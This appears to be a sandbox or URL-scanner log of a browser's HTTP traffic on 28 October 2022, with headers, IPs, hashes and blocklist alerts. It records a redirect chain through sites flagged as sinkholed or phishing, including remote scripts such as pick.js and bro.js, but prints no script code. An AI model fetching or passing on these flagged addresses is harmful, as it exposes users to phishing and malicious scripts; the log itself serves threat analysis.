GET /personal-disk/VAlWCjth-ecLJq0E-module/6199746691-sNIGrruBaNwrmrp-cJ9mWd-UgM7YnMg/439681842717-zqUods5c/ HTTP/1.1 Host: legend.nu User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	URL: legend.nu/personal-disk/VAlWCjth-ecLJq0E-module/6199746 (...) FQDN: legend.nu IP: 64.40.126.65 HASH: de043c8ae04dfe0d1d6a29a1c9dbd92ed1abf49e21cc7f98c16186f67b1a2f75 64.40.126.65 HTTP/1.1 500 Internal Server Error Content-Type: text/html; charset=UTF-8 Date: Fri, 28 Oct 2022 08:54:03 GMT Server: Apache Connection: close Transfer-Encoding: chunked --- Additional Info --- Magic: HTML document, ASCII text, with no line terminators Size: 97 Md5: f145cc6185cf707fee40b7291fb355b1 Sha1: fd4afe1ae32630c90d4cccb9250598d0174ffc57 Sha256: de043c8ae04dfe0d1d6a29a1c9dbd92ed1abf49e21cc7f98c16186f67b1a2f75 Alerts: Blocklists: - quad9: Sinkholed
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: contile.services.mozilla.com/v1/tiles FQDN: contile.services.mozilla.com IP: 34.117.237.239 HASH: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3 34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Fri, 28 Oct 2022 08:54:03 GMT content-length: 12 strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 036c965156cf07faecc342cb2e30b7a20def68ad4a10423951ce871a7a3a6777 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 6133 Cache-Control: max-age=89698 Date: Fri, 28 Oct 2022 08:54:04 GMT Etag: "635a3c19-1d7" Expires: Sat, 29 Oct 2022 09:49:02 GMT Last-Modified: Thu, 27 Oct 2022 08:06:49 GMT Server: ECS (ska/F717) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: d72d2f5d05f03753594e43fd34398221 Sha1: ac6795c1c33f3fa2139e7f8dc601c3e6de6029a5 Sha256: 036c965156cf07faecc342cb2e30b7a20def68ad4a10423951ce871a7a3a6777
GET /pick.js?v=:.::.3 HTTP/1.1 Host: new.weatherplllatform.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://legend.nu/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: new.weatherplllatform.com/pick.js?v=:.::.3 FQDN: new.weatherplllatform.com IP: 91.211.91.114 HASH: d203d1d486ba7ca83fd78fe75dde20392aca22eb888b230a7fc290ecbf141e0c 91.211.91.114 HTTP/2 200 OK content-type: application/javascript; charset=utf-8 server: nginx date: Fri, 28 Oct 2022 08:54:03 GMT last-modified: Thu, 27 Oct 2022 17:28:29 GMT vary: Accept-Encoding etag: W/"635abfbd-921" expires: Thu, 31 Dec 2037 23:55:55 GMT cache-control: max-age=315360000 strict-transport-security: max-age=15768000; content-encoding: gzip X-Firefox-Spdy: h2 --- Additional Info --- Magic: HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with very long lines (2337), with CRLF line terminators Size: 1382 Md5: dab7e984e9d315402304667bb5ec5543 Sha1: 43083751fb5e147a19cc29bea1fb1672a2e4959c Sha256: d203d1d486ba7ca83fd78fe75dde20392aca22eb888b230a7fc290ecbf141e0c
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: 8ec0ab827c956f3e324d074bee8dcb65684fa2ff4f5c2b8b79f21bb3e4119bb7 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "8EC0AB827C956F3E324D074BEE8DCB65684FA2FF4F5C2B8B79F21BB3E4119BB7" Last-Modified: Thu, 27 Oct 2022 22:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=5435 Expires: Fri, 28 Oct 2022 10:24:39 GMT Date: Fri, 28 Oct 2022 08:54:04 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 1166189307b4dc92dff344e7860b514b Sha1: aca59dddc68e86a61eb67eeb68d2fa66a37c263b Sha256: 8ec0ab827c956f3e324d074bee8dcb65684fa2ff4f5c2b8b79f21bb3e4119bb7
GET /go/mu4genjugq5dcmjrhe3a?sub2=titlespeed8 HTTP/1.1 Host: greenskymotions.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://away.cdnbestplatform.com/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site	URL: greenskymotions.net/go/mu4genjugq5dcmjrhe3a?sub2=titlespeed8 FQDN: greenskymotions.net IP: 185.177.94.152 HASH: 9924d9865ea6cd7b38c93d19ef76f5d74349eeca7de317d21d776f56e5c17f7c 185.177.94.152 HTTP/2 200 OK content-type: text/html; charset=UTF-8 server: nginx date: Fri, 28 Oct 2022 08:54:04 GMT access-control-allow-origin: * set-cookie: uuid=16738a15-f934-4aa4-83be-20047edaf749; expires=Sun, 27-Nov-2022 08:54:04 GMT; Max-Age=2592000; path=/; domain=greenskymotions.net strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (29334) Size: 53184 Md5: 9cb5644115d4458c7ce2be27c0029e60 Sha1: 4596a6cefbbf6381dfbf0c11f97a0f8a4b6b7272 Sha256: 9924d9865ea6cd7b38c93d19ef76f5d74349eeca7de317d21d776f56e5c17f7c Alerts: Blocklists: - fortinet: Phishing
GET /favicon.ico HTTP/1.1 Host: greenskymotions.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://greenskymotions.net/go/mu4genjugq5dcmjrhe3a?sub2=titlespeed8 Cookie: uuid=16738a15-f934-4aa4-83be-20047edaf749 Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin TE: trailers	URL: greenskymotions.net/favicon.ico FQDN: greenskymotions.net IP: 185.177.94.152 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 185.177.94.152 HTTP/2 204 No Content server: nginx date: Fri, 28 Oct 2022 08:54:04 GMT strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: dcc424b2fbc3b11e1547bdf644bd2de2ca9cf336d6b39f60e42c319fc7a83d02 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "DCC424B2FBC3B11E1547BDF644BD2DE2CA9CF336D6B39F60E42C319FC7A83D02" Last-Modified: Thu, 27 Oct 2022 23:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=8874 Expires: Fri, 28 Oct 2022 11:21:58 GMT Date: Fri, 28 Oct 2022 08:54:04 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 37b71533de35efb5218e73eda684f3fc Sha1: 24b4108d597b9a4abe60cabbd7e846e8ed7e62f9 Sha256: dcc424b2fbc3b11e1547bdf644bd2de2ca9cf336d6b39f60e42c319fc7a83d02
GET /sw/bro.js HTTP/1.1 Host: broworker4s.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://greenskymotions.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache	URL: broworker4s.com/sw/bro.js FQDN: broworker4s.com IP: 212.129.18.219 HASH: a42171e194f404ec1932631f8144d276b7d178a4022ab701e6d6fd574ddd469c 212.129.18.219 HTTP/2 200 OK content-type: application/javascript; charset=UTF-8 server: nginx date: Fri, 28 Oct 2022 08:54:04 GMT access-control-allow-origin: * expires: Sat, 28 Oct 2023 08:54:04 GMT cache-control: max-age=31536000 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text Size: 1438 Md5: fb7fc8d87a22b6ccc878e431137fe3e2 Sha1: e1c6355cd3958d37ae25fda24ed9217ecedec57b Sha256: a42171e194f404ec1932631f8144d276b7d178a4022ab701e6d6fd574ddd469c
GET /favicon.ico HTTP/1.1 Host: 0.greenskymotions.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://0.greenskymotions.net/index.php?p=mu4genjugq5dcmjrhe3a&sub2=titlespeed8 Cookie: uuid=16738a15-f934-4aa4-83be-20047edaf749; uuid=16738a15-f934-4aa4-83be-20047edaf749 Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin TE: trailers	URL: 0.greenskymotions.net/favicon.ico FQDN: 0.greenskymotions.net IP: 185.177.94.152 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 185.177.94.152 HTTP/2 204 No Content server: nginx date: Fri, 28 Oct 2022 08:54:04 GMT strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1 Host: push.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Sec-WebSocket-Version: 13 Origin: wss://push.services.mozilla.com/ Sec-WebSocket-Protocol: push-notification Sec-WebSocket-Extensions: permessage-deflate Sec-WebSocket-Key: LPKMVZOOpySJaBz7RWZ5hQ== Connection: keep-alive, Upgrade Sec-Fetch-Dest: websocket Sec-Fetch-Mode: websocket Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache Upgrade: websocket	URL: push.services.mozilla.com/ FQDN: push.services.mozilla.com IP: 44.238.3.246 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 44.238.3.246 HTTP/1.1 101 Switching Protocols Connection: Upgrade Upgrade: websocket Sec-WebSocket-Accept: 05TN7RG9o1Haq46ZekUur6iKQtg= --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: fd0bbf09506c6d5f1e5fd7917d09027b992bc2929f3d73fb32cba5e2c5c83eff 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "FD0BBF09506C6D5F1E5FD7917D09027B992BC2929F3D73FB32CBA5E2C5C83EFF" Last-Modified: Wed, 26 Oct 2022 12:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=5060 Expires: Fri, 28 Oct 2022 10:18:25 GMT Date: Fri, 28 Oct 2022 08:54:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 7d52cbb39ffdcc116fd4a21985a15dff Sha1: 325c401dfe5becd4a3fe5e4ba5c13fe4449d89aa Sha256: fd0bbf09506c6d5f1e5fd7917d09027b992bc2929f3d73fb32cba5e2c5c83eff
GET /favicon.ico HTTP/1.1 Host: di4.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0 Cookie: uuid=a1c5b7ac-bfce-4724-adf4-b70f23d56beb Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin TE: trailers	URL: di4.biz/favicon.ico FQDN: di4.biz IP: 185.177.92.179 HASH: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 185.177.92.179 HTTP/2 204 No Content server: nginx date: Fri, 28 Oct 2022 08:54:05 GMT strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 Alerts: Blocklists: - quad9: Sinkholed
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: c263ddf8d0a398b0b7e11f7efa9cb901bf877d939f388eb6089a236bbbdc2be4 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C263DDF8D0A398B0B7E11F7EFA9CB901BF877D939F388EB6089A236BBBDC2BE4" Last-Modified: Wed, 26 Oct 2022 12:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=4490 Expires: Fri, 28 Oct 2022 10:08:55 GMT Date: Fri, 28 Oct 2022 08:54:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 262ee317a7d41424cef3f541f6e538d3 Sha1: 1c298c901f93a95e99bdc63259f415ab84a13783 Sha256: c263ddf8d0a398b0b7e11f7efa9cb901bf877d939f388eb6089a236bbbdc2be4
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: c263ddf8d0a398b0b7e11f7efa9cb901bf877d939f388eb6089a236bbbdc2be4 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "C263DDF8D0A398B0B7E11F7EFA9CB901BF877D939F388EB6089A236BBBDC2BE4" Last-Modified: Wed, 26 Oct 2022 12:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=4490 Expires: Fri, 28 Oct 2022 10:08:55 GMT Date: Fri, 28 Oct 2022 08:54:05 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 262ee317a7d41424cef3f541f6e538d3 Sha1: 1c298c901f93a95e99bdc63259f415ab84a13783 Sha256: c263ddf8d0a398b0b7e11f7efa9cb901bf877d939f388eb6089a236bbbdc2be4
GET /sw/bro.js HTTP/1.1 Host: broworker4s.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://0.greenskymotions.net/ Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site Pragma: no-cache Cache-Control: no-cache TE: trailers	URL: broworker4s.com/sw/bro.js FQDN: broworker4s.com IP: 212.129.18.219 HASH: a755d556301ad21145775607e70217a9778f4bae55b67a64f9ffaaa660e8f537 212.129.18.219 HTTP/2 200 OK content-type: application/javascript; charset=UTF-8 server: nginx date: Fri, 28 Oct 2022 08:54:05 GMT access-control-allow-origin: * expires: Sat, 28 Oct 2023 08:54:05 GMT cache-control: max-age=31536000 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Magic: data Size: 1885 Md5: 22eca891b85a5b75d453586a14acecc4 Sha1: 6a8d60af028fd81934458a10fdcb529d5adb5f14 Sha256: a755d556301ad21145775607e70217a9778f4bae55b67a64f9ffaaa660e8f537
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6fd7879c-222e-44fb-b069-3d4b1253d118.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 08d9c053c187f965aa71c9f64ede606d7ba048db0b994b47365fe525d11b0b53 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 5424 x-amzn-requestid: d9c203ef-7b47-47a5-98ee-0853ea6926f8 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: arv1_FDcIAMFjUw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-635af9bf-0693b0ab5413673511c43789;Sampled=0 x-amzn-remapped-date: Thu, 27 Oct 2022 21:35:59 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: VpUtN7Bh1xsdQL91QtWul3gGCfNhtKTv1xKnckZyloG7aGHL0uX3-A== via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 a3bd0eb50c22e4d5fbda56a30b96002c.cloudfront.net (CloudFront), 1.1 google date: Thu, 27 Oct 2022 21:41:18 GMT age: 40367 etag: "9bf69cbc25363ddc90a4040ac8059a346e674aeb" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 5424 Md5: a7ab67cc14dbcb358f6c40ed70c63fc5 Sha1: 9bf69cbc25363ddc90a4040ac8059a346e674aeb Sha256: 08d9c053c187f965aa71c9f64ede606d7ba048db0b994b47365fe525d11b0b53
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F42eeb84c-c3e1-43c4-8856-79cf05355dd2.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: aa232240158f1a022509380282190bbcac8bec54709e2931aef2570ced77982f 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 10813 x-amzn-requestid: 3d9d26e0-d891-4bfa-ba4f-6751252710bf x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: arwxXEJGoAMF8iw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-635afb3b-2fe9e82f5034fc9f5f812f0d;Sampled=0 x-amzn-remapped-date: Thu, 27 Oct 2022 21:42:19 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: Wqv6RCQ9th4bQ4rGQTgygH8Tb0xnO4bm4-gpXzcryhSVctZgsOTnjQ== via: 1.1 e291f351a18746d40754b367095a2872.cloudfront.net (CloudFront), 1.1 a847181d425b7fc57e81eb3c800bfdf2.cloudfront.net (CloudFront), 1.1 google date: Thu, 27 Oct 2022 22:13:21 GMT age: 38444 etag: "ef1f79a7d09291ed12dd7837f8219550e4df3581" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 10813 Md5: 4598687f05036d866bcf142e32f4ec7b Sha1: ef1f79a7d09291ed12dd7837f8219550e4df3581 Sha256: aa232240158f1a022509380282190bbcac8bec54709e2931aef2570ced77982f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F9247b163-9d83-4148-9c1f-890b5e2b0a45.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 4701cc21f58c8ac8b8ad78a34973b3ade538255868afbf59be40e7f1365bcc20 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 7542 x-amzn-requestid: 95e8df21-80b6-400a-bcd5-41efdab9cc57 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: aocwLH0lIAMFT2g= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6359a800-3300914f11c46b9902b30fe4;Sampled=0 x-amzn-remapped-date: Wed, 26 Oct 2022 21:34:56 GMT x-amz-cf-pop: SEA73-P1 x-cache: Hit from cloudfront x-amz-cf-id: PUozTG1o0dKcqarNYlDGbMSBmVStSaRAwYzFAxD-MYL4NXl7iR1w2Q== via: 1.1 d0387b833e3ca8cb748a1296b4b4bf2a.cloudfront.net (CloudFront), 1.1 b36bf2c460ac693ce304817aed073112.cloudfront.net (CloudFront), 1.1 google date: Fri, 28 Oct 2022 00:09:41 GMT age: 31464 etag: "cbad9147991b1a1b27088f90fe7078d1056a9633" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 7542 Md5: bd4d7051e9d8525d8ed7d5249b24068d Sha1: cbad9147991b1a1b27088f90fe7078d1056a9633 Sha256: 4701cc21f58c8ac8b8ad78a34973b3ade538255868afbf59be40e7f1365bcc20
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F7425e2fe-72f2-47ed-8c24-ca3882b64ca1.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 01c3e63861073442cdbc414358415d2989ecffd9c3989e7946baec540b1066c0 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 4876 x-amzn-requestid: a6461ca9-ee65-420f-b066-681535c670ff x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: arv9wECHoAMFRmw= x-content-type-options: nosniff x-amzn-trace-id: Root=1-635af9f1-657e9e40753d916d02adf799;Sampled=0 x-amzn-remapped-date: Thu, 27 Oct 2022 21:36:49 GMT x-amz-cf-pop: SEA19-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: XKBFWTsqFqE48-bnCpCV2QLQaUGbRcR27yZ-ophBDl6ud3jQSh9eDQ== via: 1.1 6ca7826fb0f4c565b1af9c7737725c48.cloudfront.net (CloudFront), 1.1 325ed3ba58a560748d886354beef39c0.cloudfront.net (CloudFront), 1.1 google date: Thu, 27 Oct 2022 21:41:29 GMT age: 40356 etag: "ee6362f36470fea2a8a3432c12520f9a10175b68" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 4876 